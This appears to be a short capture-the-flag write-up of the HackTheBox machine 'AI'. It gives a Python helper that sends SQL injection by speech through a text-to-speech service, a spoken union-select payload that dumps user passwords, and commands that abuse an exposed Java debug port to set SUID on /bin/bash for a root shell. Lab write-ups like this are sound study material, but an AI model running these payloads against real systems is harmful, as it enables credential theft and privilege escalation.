Post

AI @ HackTheBox

AI @ HackTheBox

AI is a 30 point machine on HackTheBox that involves SQL injection via speech and abusing an exposed java debugging port.

Notes

SQL injection helper:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/env python
import subprocess
import requests
import shutil
import json
import sys
import re

msg = sys.argv[1]

# text to speech
headers = {'Content-type' : 'application/x-www-form-urlencoded'}
url = 'https://ttsmp3.com/makemp3_new.php'
r = requests.post(url, data={'msg': msg, 'lang':'Joey','source':'ttsmp3'}, headers=headers)

# download result
url = json.loads(r.text)['URL']
r = requests.get(url, stream=True)
with open('tmp.mp3', 'wb') as f:
    shutil.copyfileobj(r.raw, f)

# convert
subprocess.call(['ffmpeg', '-i', 'tmp.mp3',
                   'tmp.wav'])

# upload & check result
url = 'http://ai.htb/ai.php'
files = {'fileToUpload': open('tmp.wav','rb')}
r = requests.post(url, files=files, data={'submit':'Process It!'})
print(r.text)

Use helper to get the users password:

1
python3 inject.py 'open single kwote. union select password from users comment database'

Exploit jdwp (with port forwarded to localhost):

1
2
3
4
5
searchsploit -x jdwp
searchsploit -m exploits/java/remote/46501.py
python 46501.py -t localhost -p 8000 --cmd "chmod u+s /bin/bash"
curl http://127.0.0.1:8005
/bin/bash -p
This post is licensed under CC BY 4.0 by the author.